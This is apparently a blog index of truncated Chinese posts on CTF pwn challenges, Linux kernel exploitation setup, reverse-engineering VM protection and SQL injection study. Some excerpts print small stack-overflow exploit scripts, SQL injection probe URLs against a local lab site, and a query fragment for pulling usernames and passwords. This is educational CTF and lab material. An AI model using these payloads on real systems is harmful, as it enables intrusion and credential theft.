题目来源：CISCN2017 babydriver 拿到手后是一个压缩包，解压后有三个文件 boot.sh #启动脚本 bzImage #内核binary rootfs.cpio #文件系统映像 boot.sh ​ 可以发现开启了smep防护，而smep保护主要功能是禁止内核执行用户态的代码 将rootfs.cpio解压，查看里面的文件 ​ 可以发现flag的owner被设为root，以及它加载了babydriver.ko这个内核模块。很明显，漏洞应该就在这个模块中 防护机制： ☁ 4.4.72 checksec babydriver.ko

跟着大佬的博客，开始学习搭建内核环境。开篇文章记录一下。 获取内核获取内核的方法有两种，一种是自己下载源码，然后编译，另一种是通过apt直接下载内核 编译内核 下载源码 通过官网下载 在 https://www.kernel.org/ 上下载，最初我下的是2.6.0版本，发下编译会遇到很多问题……然后就放弃了，下了一个4.1.1版本 https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.1.1.tar.gz ubuntu上可以通过wget来下载 wget https://mirrors.edge.ker

最近想研究下linux内核，就开始学习内核模块编程，写篇博客，做下学习笔记。 内核模块编程模块的定义内核模块就是具有独立功能的程序，它能被单独编译，但是不能单独运行，它的运行必须被链接到内核作为内核的一部分在内核空间运行。 用户编程和内核模块编程的区别 基本组成模块通常由一组函数和数据结构组成，用来实现一种文件系统、一个驱动程序或其他内核上层的功能。 内核编程3个必须的头文件 #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> 必须的两个函数 //模块加载

考试周终于过去了，是时候又要开始学习了。所以就研究下逆向中的虚拟机保护技术，下面记录下学习的过程，以及一些收获。 基础概念逆向中的虚拟机保护是一种基于虚拟机的代码保护技术。它将基于x86汇编系统中的可执行代码转换为字节码指令系统的代码，来达到不被轻易逆向和篡改的目的。简单点说就是将程序的代码转换自定义的操作码(opcode)，然后在程序执行时再通过解释这些操作码，选择对应的函数执行，从而实现程序原有的功能。 vm_start：虚拟机的入口函数，对虚拟机环境进行初始化 vm_dispatcher:调度器，解释opcode，并选择对应的handle函数执行，当handle执行完后会跳回这里，形成一

挂机pwn手，赛后复现…….各位大佬是真的强 hack防护机制： ☁ HACK checksec hack [*] '/home/zs0zrc/game/gaoxiaoyunwei/HACK/hack' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 程序逻辑 int __cdecl main(int argc, const char

前段时间做了下SUCTF的招新赛的pwn题，题目还是很友好的，适合新手。但是一直没有写writeup，现在有时间就把writeup写了。 basic-pwn简单的栈溢出 直接上exp: from pwn import* p = process('pwn') payload = 'a'*280 + p64(0x4005c7) p.sendline(payload) p.interactive() stack也是简单栈溢出，和basic-pwn差不多 exp: from pwn import* p=process("./pwn") payloa

SQL学习笔记 SQL基础注释语句单行注释： 以“#”号开头,直到该行行尾,全部都是注释内容 以“– ”号开头,直到该行行尾,全部都是注释内容。（“– ”与注释内容之间要加有空格） 多行注释： /……/，“/”用于注释文字的开头，“/”用于注释文字的结尾。 常用函数 user()：当前数据库用户 database()：当前数据库名 version()：当前使用的数据库版本 @@datadir：数据库存储数据路径 concat()：联合数据，用于联合两条数据结果。如 concat(username,0x3a,password) group_concat()：和 concat() 类似，如

混子pwn手来学点web的东西了，网络攻防课程要求做的作业 SQL注入原理 将SQL 代码插入或添加到应用（用户）的输入参数中，之后再讲这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。 形成原因： web开发人员没有在将从web表单、cookie、输入参数等收到的值传给SQL查询前进行检查 漏洞复现平台 ： NPMserv 目标：NPMserv 中的一个政府网站 (本地搭的一个环境) 判断注入点 http://127.0.0.1/info_show.php?info_id=140 and 1=1 有回显 http://127.0.0.1/

最近打的比赛，做arm-pwn发现自己环境有点问题，就像新搭一个基于deepin系统的环境，下面记录下搭环境的过程 镜像 先装好deepin虚拟机，然后开始配环境 基本环境的安装 gdb-multiarch, git , vim, gdb ,binfmt 用来 识别文件格式 sudo apt-get update sudo apt-get install git gdb gdb-multiarch vim sudo apt-get install "binfmt*" 安装gef wget -O ~/.gdbinit-gef.py -q https://

baby_arm题如其名，这是一道arm下的pwn，用file查看了下文件信息 zs0zrc@zs0zrc-PC:~/pwn/babyarm$ file arm_pwn arm_pwn: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-aarch64.so.1, for GNU/Linux 3.7.0, BuildID[sha1]=e988eaee79fd41139699d813eac0c375dbddba43, stripped 这